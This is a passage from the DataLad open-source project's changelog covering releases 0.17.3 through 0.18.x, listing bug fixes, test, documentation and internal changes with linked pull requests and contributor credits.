workaround for an issue with documentation theme (search\n function not working on Read the Docs).\n Fixes [#7374](https://github.com/datalad/datalad/issues/7374) via\n [PR #7385](https://github.com/datalad/datalad/pull/7385)\n (by [@mslw](https://github.com/mslw))\n\n## 🏠 Internal\n\n- Type-annotate `datalad/support/gitrepo.py`. 
[PR #7341](https://github.com/datalad/datalad/pull/7341) (by [@jwodder](https://github.com/jwodder))\n\n## 🧪 Tests\n\n- Fix failing testing on CI\n [PR #7379](https://github.com/datalad/datalad/pull/7379) (by [@yarikoptic](https://github.com/yarikoptic))\n - use sample S3 url DANDI archive,\n - use our copy of old .deb from datasets.datalad.org instead of snapshots.d.o\n - use specific miniconda installer for py 3.7.\n\n<a id='changelog-0.18.3'></a>\n# 0.18.3 (2023-03-25)\n\n## 🐛 Bug Fixes\n\n- Fixed that the `get` command would fail, when subdataset source-candidate-templates where using the `path` property from `.gitmodules`.\n Also enhance the respective documentation for the `get` command.\n Fixes [#7274](https://github.com/datalad/datalad/issues/7274) via\n [PR #7280](https://github.com/datalad/datalad/pull/7280)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Improve up-to-dateness of config reports across manager instances. Fixes [#7299](https://github.com/datalad/datalad/issues/7299) via [PR #7301](https://github.com/datalad/datalad/pull/7301) (by [@mih](https://github.com/mih))\n\n- BF: GitRepo.merge do not allow merging unrelated unconditionally. [PR #7312](https://github.com/datalad/datalad/pull/7312) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Do not render (empty) WTF report on other records. [PR #7322](https://github.com/datalad/datalad/pull/7322) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Fixed a bug where changing DataLad's log level could lead to failing git-annex calls.\n Fixes [#7328](https://github.com/datalad/datalad/issues/7328) via\n [PR #7329](https://github.com/datalad/datalad/pull/7329)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Fix an issue with uninformative error reporting by the datalad special remote.\n Fixes [#7332](https://github.com/datalad/datalad/issues/7332) via\n [PR #7333](https://github.com/datalad/datalad/pull/7333)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Fix save to not force committing into git if reference dataset is pure git (not git-annex). Fixes [#7351](https://github.com/datalad/datalad/issues/7351) via [PR #7355](https://github.com/datalad/datalad/pull/7355) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- Include a few previously missing commands in html API docs.\n Fixes [#7288](https://github.com/datalad/datalad/issues/7288) via\n [PR #7289](https://github.com/datalad/datalad/pull/7289)\n (by [@mslw](https://github.com/mslw))\n\n## 🏠 Internal\n\n- Type-annotate almost all of `datalad/utils.py`; add `datalad/typing.py`. [PR #7317](https://github.com/datalad/datalad/pull/7317) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate and fix `datalad/support/strings.py`. [PR #7318](https://github.com/datalad/datalad/pull/7318) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate `datalad/support/globbedpaths.py`. [PR #7327](https://github.com/datalad/datalad/pull/7327) (by [@jwodder](https://github.com/jwodder))\n\n- Extend type-annotations for `datalad/support/path.py`. [PR #7336](https://github.com/datalad/datalad/pull/7336) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate various things in `datalad/runner/`. [PR #7337](https://github.com/datalad/datalad/pull/7337) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate some more files in `datalad/support/`. 
[PR #7339](https://github.com/datalad/datalad/pull/7339) (by [@jwodder](https://github.com/jwodder))\n\n## 🧪 Tests\n\n- Skip or xfail some currently failing or stalling tests. [PR #7331](https://github.com/datalad/datalad/pull/7331) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Skip with_sameas_remote when rsync and annex are incompatible. Fixes [#7320](https://github.com/datalad/datalad/issues/7320) via [PR #7342](https://github.com/datalad/datalad/pull/7342) (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Fix testing assumption - do create pure GitRepo superdataset and test against it. [PR #7353](https://github.com/datalad/datalad/pull/7353) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.2'></a>\n# 0.18.2 (2023-02-27)\n\n## 🐛 Bug Fixes\n\n- Fix `create-sibling` for non-English SSH remotes by providing `LC_ALL=C` for the `ls` call. [PR #7265](https://github.com/datalad/datalad/pull/7265) (by [@nobodyinperson](https://github.com/nobodyinperson))\n\n- Fix EnsureListOf() and EnsureTupleOf() for string inputs. [PR #7267](https://github.com/datalad/datalad/pull/7267) (by [@nobodyinperson](https://github.com/nobodyinperson))\n\n- create-sibling: Use C.UTF-8 locale instead of C on the remote end. [PR #7273](https://github.com/datalad/datalad/pull/7273) (by [@nobodyinperson](https://github.com/nobodyinperson))\n\n- Address compatibility with most recent git-annex where info would exit with non-0. [PR #7292](https://github.com/datalad/datalad/pull/7292) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🔩 Dependencies\n\n- Revert \"Revert \"Remove chardet version upper limit\"\". [PR #7263](https://github.com/datalad/datalad/pull/7263) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🏠 Internal\n\n- Codespell more (CHANGELOGs etc) and remove custom CLI options from tox.ini. [PR #7271](https://github.com/datalad/datalad/pull/7271) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Use older python 3.8 in testing nose utils in github-action test-nose. Fixes [#7259](https://github.com/datalad/datalad/issues/7259) via [PR #7260](https://github.com/datalad/datalad/pull/7260) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.1'></a>\n# 0.18.1 (2023-01-16)\n\n## 🐛 Bug Fixes\n\n- Fixes crashes on windows where DataLad was mistaking git-annex 10.20221212 for\n a not yet released git-annex version and trying to use a new feature.\n Fixes [#7248](https://github.com/datalad/datalad/issues/7248) via\n [PR #7249](https://github.com/datalad/datalad/pull/7249)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 📝 Documentation\n\n- DOC: fix EnsureCallable docstring. 
[PR #7245](https://github.com/datalad/datalad/pull/7245) (by [@matrss](https://github.com/matrss))\n\n## 🏎 Performance\n\n- Integrate buffer size optimization from datalad-next, leading to significant\n performance improvement for status and diff.\n Fixes [#7190](https://github.com/datalad/datalad/issues/7190) via\n [PR #7250](https://github.com/datalad/datalad/pull/7250)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n<a id='changelog-0.18.0'></a>\n# 0.18.0 (2022-12-31)\n\n## 💥 Breaking Changes\n\n- Move all old-style metadata commands `aggregate_metadata`, `search`, `metadata` and `extract-metadata`, as well as the `cfg_metadatatypes` procedure and the old metadata extractors into the datalad-deprecated extension.\n Now recommended way of handling metadata is to install the datalad-metalad extension instead.\n Fixes [#7012](https://github.com/datalad/datalad/issues/7012) via\n [PR #7014](https://github.com/datalad/datalad/pull/7014)\n\n- Automatic reconfiguration of the ORA special remote when cloning from RIA\n stores now only applies locally rather than being committed.\n [PR #7235](https://github.com/datalad/datalad/pull/7235)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🚀 Enhancements and New Features\n\n- A repository description can be specified with a new `--description`\n option when creating siblings using `create-sibling-[gin|gitea|github|gogs]`.\n Fixes [#6816](https://github.com/datalad/datalad/issues/6816)\n via [PR #7109](https://github.com/datalad/datalad/pull/7109)\n (by [@mslw](https://github.com/mslw))\n\n- Make validation failure of alternative constraints more informative.\n Fixes [#7092](https://github.com/datalad/datalad/issues/7092) via\n [PR #7132](https://github.com/datalad/datalad/pull/7132)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Saving removed dataset content was sped-up, and reporting of types of removed\n content now accurately states `dataset` for added and removed subdatasets,\n instead of `file`. Moreover, saving previously staged deletions is now also\n reported.\n [PR #6784](https://github.com/datalad/datalad/pull/6784) (by [@mih](https://github.com/mih))\n\n- `foreach-dataset` command got a new possible value for the --output-streamns|--o-s\n option 'relpath' to capture and pass-through prefixing with path to subds. Very\n handy for e.g. running `git grep` command across subdatasets.\n [PR #7071](https://github.com/datalad/datalad/pull/7071)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n- New config `datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE` allows to add and/or overwrite local configuration for the created sibling by the commands `create-sibling-<gin|gitea|github|gitlab|gogs>`. 
[PR #7213](https://github.com/datalad/datalad/pull/7213) (by [@matrss](https://github.com/matrss))\n\n- The `siblings` command does not concern the user with messages about\n inconsequential failure to annex-enable a remote anymore.\n [PR #7217](https://github.com/datalad/datalad/pull/7217)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- ORA special remote now allows to override its configuration locally.\n [PR #7235](https://github.com/datalad/datalad/pull/7235)\n (by [@bpoldrack](https://github.com/bpoldrack))\n- Added a 'ria' special remote to provide backwards compatibility with datasets\n that were set up with the deprecated [ria-remote](https://github.com/datalad/git-annex-ria-remote).\n [PR #7235](https://github.com/datalad/datalad/pull/7235)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🐛 Bug Fixes\n\n- When ``create-sibling-ria`` was invoked with a sibling name of a pre-existing sibling, a duplicate key in the result record caused a crashed.\n Fixes [#6950](https://github.com/datalad/datalad/issues/6950) via\n [PR #6952](https://github.com/datalad/datalad/pull/6952) (by [@adswa](https://api.github.com/users/adswa))\n\n## 📝 Documentation\n\n- create-sibling-ria's docstring now defines the schema of RIA URLs and clarifies internal layout of a RIA store.\n [PR #6861](https://github.com/datalad/datalad/pull/6861) (by [@adswa](https://api.github.com/users/adswa))\n\n- Move maintenance team info from issue to CONTRIBUTING.\n [PR #6904](https://github.com/datalad/datalad/pull/6904) (by [@adswa](https://api.github.com/users/adswa))\n\n- Describe specifications for a DataLad GitHub Action.\n [PR #6931](https://github.com/datalad/datalad/pull/6931) (by [@thewtex](https://api.github.com/users/thewtex))\n\n- Fix capitalization of some service names.\n [PR #6936](https://github.com/datalad/datalad/pull/6936) (by [@aqw](https://api.github.com/users/aqw))\n\n- Command categories in help text are more consistently named.\n [PR #7027](https://github.com/datalad/datalad/pull/7027) (by [@aqw](https://api.github.com/users/aqw))\n\n- DOC: Add design document on Tests and CI. [PR #7195](https://github.com/datalad/datalad/pull/7195) (by [@adswa](https://github.com/adswa))\n\n- CONTRIBUTING.md was extended with up-to-date information on CI logging, changelog and release procedures. 
[PR #7204](https://github.com/datalad/datalad/pull/7204) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🏠 Internal\n\n- Allow EnsureDataset constraint to handle Path instances.\n Fixes [#7069](https://github.com/datalad/datalad/issues/7069) via\n [PR #7133](https://github.com/datalad/datalad/pull/7133)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Use `looseversion.LooseVersion` as drop-in replacement for `distutils.version.LooseVersion`\n Fixes [#6307](https://github.com/datalad/datalad/issues/6307) via\n [PR #6839](https://github.com/datalad/datalad/pull/6839)\n (by [@effigies](https://api.github.com/users/effigies))\n\n- Use --pathspec-from-file where possible instead of passing long lists of paths to git/git-annex calls.\n Fixes [#6922](https://github.com/datalad/datalad/issues/6922) via\n [PR #6932](https://github.com/datalad/datalad/pull/6932) (by [@yarikoptic](https://api.github.com/users/yarikoptic))\n\n- Make clone_dataset() better patchable ny extensions and less monolithic.\n [PR #7017](https://github.com/datalad/datalad/pull/7017) (by [@mih](https://api.github.com/users/mih))\n\n- Remove `simplejson` in favor of using `json`.\n Fixes [#7034](https://github.com/datalad/datalad/issues/7034) via\n [PR #7035](https://github.com/datalad/datalad/pull/7035) (by [@christian-monch](https://api.github.com/users/christian-monch))\n\n- Fix an error in the command group names-test.\n [PR #7044](https://github.com/datalad/datalad/pull/7044) (by [@christian-monch](https://api.github.com/users/christian-monch))\n\n- Move eval_results() into interface.base to simplify imports for command implementations. Deprecate use from interface.utils accordingly. Fixes [#6694](https://github.com/datalad/datalad/issues/6694) via [PR #7170](https://github.com/datalad/datalad/pull/7170) (by [@adswa](https://github.com/adswa))\n\n## 🏎 Performance\n\n- Use regular dicts instead of OrderedDicts for speedier operations. Fixes [#6566](https://github.com/datalad/datalad/issues/6566) via [PR #7174](https://github.com/datalad/datalad/pull/7174) (by [@adswa](https://github.com/adswa))\n\n- Reimplement `get_submodules_()` without `get_content_info()` for substantial performance boosts especially for large datasets with few subdatasets. Originally proposed in [PR #6942](https://github.com/datalad/datalad/pull/6942) by [@mih](https://github.com/mih), fixing [#6940](https://github.com/datalad/datalad/issues/6940). [PR #7189](https://github.com/datalad/datalad/pull/7189) (by [@adswa](https://github.com/adswa)). Complemented with [PR #7220](https://github.com/datalad/datalad/pull/7220) (by [@yarikoptic](https://github.com/yarikoptic)) to avoid `O(N^2)` (instead of `O(N*log(N))` performance in some cases.\n\n- Use --include=* or --anything instead of --copies 0 to speed up get_content_annexinfo. [PR #7230](https://github.com/datalad/datalad/pull/7230) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Re-enable two now-passing core test on Windows CI.\n [PR #7152](https://github.com/datalad/datalad/pull/7152) (by [@adswa](https://api.github.com/users/adswa))\n\n- Remove the `with_testrepos` decorator and associated tests for it\n Fixes [#6752](https://github.com/datalad/datalad/issues/6752) via\n [PR #7176](https://github.com/datalad/datalad/pull/7176) (by [@adswa](https://api.github.com/users/adswa))\n\n<a id='changelog-0.17.10'></a>\n# 0.17.10 (2022-12-14)\n\n## 🚀 Enhancements and New Features\n\n- Enhance concurrent invocation behavior of `ThreadedRunner.run()`. 
If possible invocations are serialized instead of raising *re-enter* runtime errors. Deadlock situations are detected and runtime errors are raised instead of deadlocking.\n Fixes [#7138](https://github.com/datalad/datalad/issues/7138) via\n [PR #7201](https://github.com/datalad/datalad/pull/7201)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Exceptions bubbling up through CLI are now reported on including their chain\n of __cause__.\n Fixes [#7163](https://github.com/datalad/datalad/issues/7163) via\n [PR #7210](https://github.com/datalad/datalad/pull/7210)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🐛 Bug Fixes\n\n- BF: read RIA config from stdin instead of temporary file. Fixes [#6514](https://github.com/datalad/datalad/issues/6514) via [PR #7147](https://github.com/datalad/datalad/pull/7147) (by [@adswa](https://github.com/adswa))\n\n- Prevent doomed annex calls on files we already know are untracked. Fixes [#7032](https://github.com/datalad/datalad/issues/7032) via [PR #7166](https://github.com/datalad/datalad/pull/7166) (by [@adswa](https://github.com/adswa))\n\n- Comply to Posix-like clone URL formats on Windows. Fixes [#7180](https://github.com/datalad/datalad/issues/7180) via [PR #7181](https://github.com/datalad/datalad/pull/7181) (by [@adswa](https://github.com/adswa))\n\n- Ensure that paths used in the datalad-url field of .gitmodules are posix. Fixes [#7182](https://github.com/datalad/datalad/issues/7182) via [PR #7183](https://github.com/datalad/datalad/pull/7183) (by [@adswa](https://github.com/adswa))\n\n- Bandaids for export-to-figshare to restore functionality. [PR #7188](https://github.com/datalad/datalad/pull/7188) (by [@adswa](https://github.com/adswa))\n\n- Fixes hanging threads when `close()` or `del` where called in `BatchedCommand` instances. That could lead to hanging tests if the tests used the `@serve_path_via_http()`-decorator\n Fixes [#6804](https://github.com/datalad/datalad/issues/6804) via\n [PR #7201](https://github.com/datalad/datalad/pull/7201)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Interpret file-URL path components according to the local operating system as described in RFC 8089. With this fix, `datalad.network.RI('file:...').localpath` returns a correct local path on Windows if the RI is constructed with a file-URL.\n Fixes [#7186](https://github.com/datalad/datalad/issues/7186) via\n [PR #7206](https://github.com/datalad/datalad/pull/7206)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Fix a bug when retrieving several files from a RIA store via SSH, when the annex key does not contain size information. Fixes [#7214](https://github.com/datalad/datalad/issues/7214) via [PR #7215](https://github.com/datalad/datalad/pull/7215) (by [@mslw](https://github.com/mslw))\n\n- Interface-specific (python vs CLI) doc generation for commands and their parameters was broken when brackets were used within the interface markups.\n Fixes [#7225](https://github.com/datalad/datalad/issues/7225) via\n [PR #7226](https://github.com/datalad/datalad/pull/7226)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 📝 Documentation\n\n- Fix documentation of `Runner.run()` to not accept strings. 
Instead, encoding\n must be ensured by the caller.\n Fixes [#7145](https://github.com/datalad/datalad/issues/7145) via\n [PR #7155](https://github.com/datalad/datalad/pull/7155)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🏠 Internal\n\n- Fix import of the `ls` command from datalad-deprecated for benchmarks.\n Fixes [#7149](https://github.com/datalad/datalad/issues/7149) via\n [PR #7154](https://github.com/datalad/datalad/pull/7154)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Unify definition of parameter choices with `datalad clean`.\n Fixes [#7026](https://github.com/datalad/datalad/issues/7026) via\n [PR #7161](https://github.com/datalad/datalad/pull/7161)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🧪 Tests\n\n- Fix test failure with old annex. Fixes [#7157](https://github.com/datalad/datalad/issues/7157) via [PR #7159](https://github.com/datalad/datalad/pull/7159) (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Re-enable now passing test_path_diff test on Windows. Fixes [#3725](https://github.com/datalad/datalad/issues/3725) via [PR #7194](https://github.com/datalad/datalad/pull/7194) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Use Plaintext keyring backend in tests to avoid the need for (interactive)\n authentication to unlock the keyring during (CI-) test runs.\n Fixes [#6623](https://github.com/datalad/datalad/issues/6623) via\n [PR #7209](https://github.com/datalad/datalad/pull/7209)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n<a id='changelog-0.17.9'></a>\n# 0.17.9 (2022-11-07)\n\n## 🐛 Bug Fixes\n\n- Various small fixups ran after looking post-release and trying to build Debian package. [PR #7112](https://github.com/datalad/datalad/pull/7112) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- BF: Fix add-archive-contents try-finally statement by defining variable earlier. [PR #7117](https://github.com/datalad/datalad/pull/7117) (by [@adswa](https://github.com/adswa))\n\n- Fix RIA file URL reporting in exception handling. [PR #7123](https://github.com/datalad/datalad/pull/7123) (by [@adswa](https://github.com/adswa))\n\n- HTTP download treated '429 - too many requests' as an authentication issue and\n was consequently trying to obtain credentials.\n Fixes [#7129](https://github.com/datalad/datalad/issues/7129) via\n [PR #7129](https://github.com/datalad/datalad/pull/7129)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🔩 Dependencies\n\n- Unrestrict pytest and pytest-cov versions. [PR #7125](https://github.com/datalad/datalad/pull/7125) (by [@jwodder](https://github.com/jwodder))\n\n- Remove remaining references to `nose` and the implied requirement for building the documentation\n Fixes [#7100](https://github.com/datalad/datalad/issues/7100) via\n [PR #7136](https://github.com/datalad/datalad/pull/7136)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🏠 Internal\n\n- Use datalad/release-action. Fixes [#7110](https://github.com/datalad/datalad/issues/7110). [PR #7111](https://github.com/datalad/datalad/pull/7111) (by [@jwodder](https://github.com/jwodder))\n\n- Fix all logging to use %-interpolation and not .format, sort imports in touched files, add pylint-ing for % formatting in log messages to `tox -e lint`. 
[PR #7118](https://github.com/datalad/datalad/pull/7118) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Increase the upper time limit after which we assume that a process is stalling.\n That should reduce false positives from `datalad.support.tests.test_parallel.py::test_stalling`,\n without impacting the runtime of passing tests.\n [PR #7119](https://github.com/datalad/datalad/pull/7119)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- XFAIL a check on length of results in test_gracefull_death. [PR #7126](https://github.com/datalad/datalad/pull/7126) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Configure Git to allow for \"file\" protocol in tests. [PR #7130](https://github.com/datalad/datalad/pull/7130) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.17.8'></a>\n# 0.17.8 (2022-10-24)\n\n## Bug Fixes\n\n- Prevent adding duplicate entries to .gitmodules. [PR #7088](https://github.com/datalad/datalad/pull/7088) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- [BF] Prevent double yielding of impossible get result\n Fixes [#5537](https://github.com/datalad/datalad/issues/5537).\n [PR #7093](https://github.com/datalad/datalad/pull/7093) (by\n [@jsheunis](https://github.com/jsheunis))\n\n- Stop rendering the output of internal `subdatset()` call in the\n results of `run_procedure()`.\n Fixes [#7091](https://github.com/datalad/datalad/issues/7091) via\n [PR #7094](https://github.com/datalad/datalad/pull/7094)\n (by [@mslw](https://github.com/mslw) & [@mih](https://github.com/mih))\n\n- Improve handling of `--existing reconfigure` in\n `create-sibling-ria`: previously, the command would not make the\n underlying `git init` call for existing local repositories, leading\n to some configuration updates not being applied. Partially addresses\n https://github.com/datalad/datalad/issues/6967 via\n https://github.com/datalad/datalad/pull/7095 (by @mslw)\n\n- Ensure subprocess environments have a valid path in `os.environ['PWD']`,\n even if a Path-like object was given to the runner on subprocess creation\n or invocation.\n Fixes [#7040](https://github.com/datalad/datalad/issues/7040) via\n [PR #7107](https://github.com/datalad/datalad/pull/7107)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Improved reporting when using `dry-run` with github-like\n `create-sibling*` commands (`-gin`, `-gitea`, `-github`,\n `-gogs`). The result messages will now display names of the\n repositories which would be created (useful for recursive\n operations).\n [PR #7103](https://github.com/datalad/datalad/pull/7103)\n (by [@mslw](https://github.com/mslw))\n\n<a id='changelog-0.17.7'></a>\n# 0.17.7 (2022-10-14)\n\n## Bug Fixes\n\n- Let `EnsureChoice` report the value is failed validating.\n [PR #7067](https://github.com/datalad/datalad/pull/7067) (by\n [@mih](https://github.com/mih))\n\n- Avoid writing to stdout/stderr from within datalad sshrun. This could lead to\n broken pipe errors when cloning via SSH and was superfluous to begin with.\n Fixes https://github.com/datalad/datalad/issues/6599 via\n https://github.com/datalad/datalad/pull/7072 (by @bpoldrack)\n\n- BF: lock across threads check/instantiation of Flyweight instances. 
Fixes [#6598](https://github.com/datalad/datalad/issues/6598) via [PR #7075](https://github.com/datalad/datalad/pull/7075) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## Internal\n\n- Do not use `gen4`-metadata methods in `datalad metadata`-command.\n [PR #7001](https://github.com/datalad/datalad/pull/7001) (by\n [@christian-monch](https://github.com/christian-monch))\n\n- Revert \"Remove chardet version upper limit\" (introduced in 0.17.6~11^2) to bring back upper limit <= 5.0.0 on chardet. Otherwise we can get some deprecation warnings from requests [PR #7057](https://github.com/datalad/datalad/pull/7057) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Ensure that `BatchedCommandError` is raised if the subprocesses of `BatchedCommand` fails or raises a `CommandError`. [PR #7068](https://github.com/datalad/datalad/pull/7068) (by [@christian-monch](https://github.com/christian-monch))\n\n- RF: remove unused code str-ing PurePath. [PR #7073](https://github.com/datalad/datalad/pull/7073) (by\n [@yarikoptic](https://github.com/yarikoptic))\n\n- Update GitHub Actions action versions.\n [PR #7082](https://github.com/datalad/datalad/pull/7082) (by\n [@jwodder](https://github.com/jwodder))\n\n## Tests\n\n- Fix broken test helpers for result record testing that would falsely pass.\n [PR #7002](https://github.com/datalad/datalad/pull/7002) (by [@bpoldrack](https://github.com/bpoldrack))\n\n<a id='changelog-0.17.6'></a>\n# 0.17.6 (2022-09-21)\n\n## Bug Fixes\n\n- UX: push - provide specific error with details if push failed due to\n permission issue. [PR #7011](https://github.com/datalad/datalad/pull/7011)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Fix datalad --help to not have *Global options* empty with python 3.10 and\n list options in \"options:\" section.\n [PR #7028](https://github.com/datalad/datalad/pull/7028)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Let `create` touch the dataset root, if not saving in parent dataset.\n [PR #7036](https://github.com/datalad/datalad/pull/7036) (by\n [@mih](https://github.com/mih))\n\n- Let `get_status_dict()` use exception message if none is passed.\n [PR #7037](https://github.com/datalad/datalad/pull/7037) (by\n [@mih](https://github.com/mih))\n\n- Make choices for `status|diff --annex` and `status|diff --untracked` visible.\n [PR #7039](https://github.com/datalad/datalad/pull/7039) (by\n [@mih](https://github.com/mih))\n\n- push: Assume 0 bytes pushed if git-annex does not provide bytesize.\n [PR #7049](https://github.com/datalad/datalad/pull/7049) (by\n [@yarikoptic](https://github.com/yarikoptic))\n\n## Internal\n\n- Use scriv for CHANGELOG generation in release workflow.\n [PR #7009](https://github.com/datalad/datalad/pull/7009) (by\n [@jwodder](https://github.com/jwodder))\n\n- Stop using auto.\n [PR #7024](https://github.com/datalad/datalad/pull/7024)\n (by [@jwodder](https://github.com/jwodder))\n\n## Tests\n\n- Allow for any 2 from first 3 to be consumed in test_gracefull_death.\n [PR #7041](https://github.com/datalad/datalad/pull/7041) (by\n [@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.5 (Fri Sep 02 2022)\n\n#### 🐛 Bug Fix\n\n- BF: blacklist 23.9.0 of keyring as introduces regression [#7003](https://github.com/datalad/datalad/pull/7003) ([@yarikoptic](https://github.com/yarikoptic))\n- Make the manpages build reproducible via datalad.source.epoch (to be used in Debian packaging) [#6997](https://github.com/datalad/datalad/pull/6997) ([@lamby](https://github.com/lamby) [email protected] 
[@yarikoptic](https://github.com/yarikoptic))\n- BF: backquote path/drive in Changelog [#6997](https://github.com/datalad/datalad/pull/6997) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- Chris Lamb ([@lamby](https://github.com/lamby))\n- DataLad Bot ([email protected])\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.4 (Tue Aug 30 2022)\n\n#### 🐛 Bug Fix\n\n- BF: make logic more consistent for files=[] argument (which is False but not None) [#6976](https://github.com/datalad/datalad/pull/6976) ([@yarikoptic](https://github.com/yarikoptic))\n- Run pytests in parallel (-n 2) on appveyor [#6987](https://github.com/datalad/datalad/pull/6987) ([@yarikoptic](https://github.com/yarikoptic))\n- Add workflow for autogenerating changelog snippets [#6981](https://github.com/datalad/datalad/pull/6981) ([@jwodder](https://github.com/jwodder))\n- Provide `/dev/null` (`b:\\nul` on 💾 Windows) instead of empty string as a git-repo to avoid reading local repo configuration [#6986](https://github.com/datalad/datalad/pull/6986) ([@yarikoptic](https://github.com/yarikoptic))\n- RF: call_from_parser - move code into \"else\" to simplify reading etc [#6982](https://github.com/datalad/datalad/pull/6982) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: if early attempt to parse resulted in error, setup subparsers [#6980](https://github.com/datalad/datalad/pull/6980) ([@yarikoptic](https://github.com/yarikoptic))\n- Run pytests in parallel (-n 2) on Travis [#6915](https://github.com/datalad/datalad/pull/6915) ([@yarikoptic](https://github.com/yarikoptic))\n- Send one character (no newline) to stdout in protocol test to guarantee a single \"message\" and thus a single custom value [#6978](https://github.com/datalad/datalad/pull/6978) ([@christian-monch](https://github.com/christian-monch))\n\n#### 🧪 Tests\n\n- TST: test_stalling -- wait x10 not just x5 time [#6995](https://github.com/datalad/datalad/pull/6995) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. 
Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.3 (Tue Aug 23 2022)\n\n#### 🐛 Bug Fix\n\n- BF: git_ignore_check do not overload possible value of stdout/err if present [#6937](https://github.com/datalad/datalad/pull/6937) ([@yarikoptic](https://github.com/yarikoptic))\n- DOCfix: fix docstring GeneratorStdOutErrCapture to say that treats both stdout and stderr identically [#6930](https://github.com/datalad/datalad/pull/6930) ([@yarikoptic](https://github.com/yarikoptic))\n- Explain purpose of create-sibling-ria's --post-update-hook [#6958](https://github.com/datalad/datalad/pull/6958) ([@mih](https://github.com/mih))\n- ENH+BF: get_parent_paths - make / into sep option and consistently use \"/\" as path separator [#6963](https://github.com/datalad/datalad/pull/6963) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TEMP): use git-annex from neurodebian -devel to gain fix for bug detected with datalad-crawler [#6965](https://github.com/datalad/datalad/pull/6965) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): make tests use _path_ helper for Windows \"friendliness\" of the tests [#6955](https://github.com/datalad/datalad/pull/6955) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): prevent auto-upgrade of \"remote\" test sibling, do not use local path for URL [#6957](https://github.com/datalad/datalad/pull/6957) ([@yarikoptic](https://github.com/yarikoptic))\n- Forbid drop operation from symlink'ed annex (e.g. due to being cloned with --reckless=ephemeral) to prevent data-loss [#6959](https://github.com/datalad/datalad/pull/6959) ([@mih](https://github.com/mih))\n- Acknowledge git-config comment chars [#6944](https://github.com/datalad/datalad/pull/6944) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Minor tuneups to please updated codespell [#6956](https://github.com/datalad/datalad/pull/6956) ([@yarikoptic](https://github.com/yarikoptic))\n- TST: Add a testcase for #6950 [#6957](https://github.com/datalad/datalad/pull/6957) ([@adswa](https://github.com/adswa))\n- BF+ENH(TST): fix typo in code of wtf filesystems reports [#6920](https://github.com/datalad/datalad/pull/6920) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: Datalad -> DataLad [#6937](https://github.com/datalad/datalad/pull/6937) ([@aqw](https://github.com/aqw))\n- BF: fix typo which prevented silently to not show details of filesystems [#6930](https://github.com/datalad/datalad/pull/6930) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): allow for a annex repo version to upgrade if running in adjusted branches [#6927](https://github.com/datalad/datalad/pull/6927) ([@yarikoptic](https://github.com/yarikoptic))\n- RF extensions github action to centralize configuration for extensions etc, use pytest for crawler [#6914](https://github.com/datalad/datalad/pull/6914) 